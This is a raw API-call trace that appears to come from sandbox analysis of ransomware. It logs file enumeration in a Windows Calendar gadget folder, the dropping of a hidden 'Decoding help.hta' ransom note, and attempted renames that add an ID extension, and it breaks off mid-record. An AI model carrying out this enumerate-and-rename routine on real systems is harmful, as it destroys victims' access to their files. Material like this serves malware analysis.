0x93c [0054.559] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*", lpFindFileData=0x26a9fd30 | out: lpFindFileData=0x26a9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x805ee1db, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x805ee1db, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5ef0 [0056.134] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.134] FindNextFileW (in: hFindFile=0x5a5ef0, lpFindFileData=0x26a9fd30 | out: lpFindFileData=0x26a9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x805ee1db, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x805ee1db, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.134] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.134] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.134] FindNextFileW (in: hFindFile=0x5a5ef0, lpFindFileData=0x26a9fd30 | out: lpFindFileData=0x26a9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28135767, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x28135767, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x2815b8c5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x6a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg-desk.png", cAlternateFileName="")) returned 1 [0056.580] lstrcpyW (in: lpString1=0x9862720, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" [0056.580] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned 71 [0056.580] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta" [0056.580] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\decoding help.hta")) returned 0xffffffff [0056.580] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x9e0 [0058.031] WriteFile (in: hFile=0x9e0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x26a9fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x26a9fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.032] CloseHandle (hObject=0x9e0) returned 1 [0058.032] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.032] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bg-desk.png") returned 1 [0058.032] lstrlenW (lpString="bg-desk.png") returned 11 [0058.032] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" [0058.032] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned 71 [0058.032] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\", lpString2="bg-desk.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png" [0058.032] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png" [0058.032] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png.[ID]g9uZrLhJaygpwRm1[ID]" [0058.033] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-desk.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-desk.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.039] FindNextFileW (in: hFindFile=0x5a5ef0, lpFindFileData=0x26a9fd30 | out: lpFindFileData=0x26a9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8232d98a, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8232d98a, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2815b8c5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x557, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg-dock.png", cAlternateFileName="")) returned 1 [0059.039] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" [0059.039] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned 71 [0059.039] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta" [0059.039] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\decoding help.hta")) returned 0x1 [0059.039] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bg-dock.png") returned 1 [0059.040] lstrlenW (lpString="bg-dock.png") returned 11 [0059.040] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" [0059.040] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned 71 [0059.040] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\", lpString2="bg-dock.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png" [0059.040] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png" [0059.040] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.040] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-dock.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-dock.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.413] FindNextFileW (in: hFindFile=0x5a5ef0, lpFindFileData=0x26a9fd30 | out: lpFindFileData=0x26a9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8232d98a, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8232d98a, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2815b8c5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg-today.png", cAlternateFileName="")) returned 1 [0059.413] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" [0059.413] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned 71 [0059.413] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta" [0059.413] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\decoding help.hta")) returned 0x1 [0059.413] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bg-today.png") returned 1 [0059.413] lstrlenW (lpString="bg-today.png") returned 12 [0059.413] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" [0059.413] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned 71 [0059.413] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\", lpString2="bg-today.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png" [0059.413] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png" [0059.413] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.413] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-today.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-today.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.413] FindNextFileW (in: hFindFile=0x5a5ef0, lpFindFileData=0x26a9fd30 | out: lpFindFileData=0x26a9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8245e472, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8245e472, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28181a23, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xc9, dwReserved0=0x0, dwReserved1=0x0, cFileName="bNext-disable.png", cAlternateFileName="")) returned 1 [0059.413] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" [0059.414] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned 71 [0059.414] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta" [0059.414] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\decoding help.hta")) returned 0x1 [0059.414] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bNext-disable.png") returned 1 [0059.414] lstrlenW (lpString="bNext-disable.png") returned 17 [0059.414] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" [0059.414] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned 71 [0059.414] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\", lpString2="bNext-disable.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png" [0059.414] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png" [0059.414] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.414] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext-disable.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext-disable.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.377] FindNextFileW (in: hFindFile=0x5a5ef0, lpFindFileData=0x26a9fd30 | out: lpFindFileData=0x26a9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82353ae7, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82353ae7, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28181a23, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x19d, dwReserved0=0x0, dwReserved1=0x0, cFileName="bNext-down.png", cAlternateFileName="")) returned 1 [0060.377] lstrcpyW (in: lpString1=0x2528fe40, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" [0060.377] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned 71 [0060.377] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta" [0060.377] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\decoding help.hta")) returned 0x1 [0060.377] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bNext-down.png") returned 1 [0060.377] lstrlenW (lpString="bNext-down.png") returned 14 [0060.377] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" [0060.377] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned 71 [0060.377] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\", lpString2="bNext-down.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png" [0060.377] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png" [0060.377] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png.[ID]g9uZrLhJaygpwRm1[ID]" [0060.377] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext-down.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext-down.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.377] FindNextFileW (in: hFindFile=0x5a5ef0, lpFindFileData=0x26a9fd30 | out: lpFindFileData=0x26a9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82379c44, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82379c44, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x281a7b81, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x242, dwReserved0=0x0, dwReserved1=0x0, cFileName="bNext-hot.png", cAlternateFileName="")) returned 1 [0060.377] lstrcpyW (in: lpString1=0x2528fe40, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" [0060.377] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned 71 [0060.377] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta" [0060.378] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\decoding help.hta")) returned 0x1 [0060.378] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bNext-hot.png") returned 1 [0060.378] lstrlenW (lpString="bNext-hot.png") returned 13 [0060.378] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" [0060.378] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned 71 [0060.378] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\", lpString2="bNext-hot.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png" [0060.378] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png" [0060.378] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png.[ID]g9uZrLhJaygpwRm1[ID]" [0060.378] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext-hot.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext-hot.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.302] FindNextFileW (in: hFindFile=0x5a5ef0, lpFindFileData=0x26a9fd30 | out: lpFindFileData=0x26a9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8239fda1, ftCreationTime.dwHighDateTime=0x1ca0403, 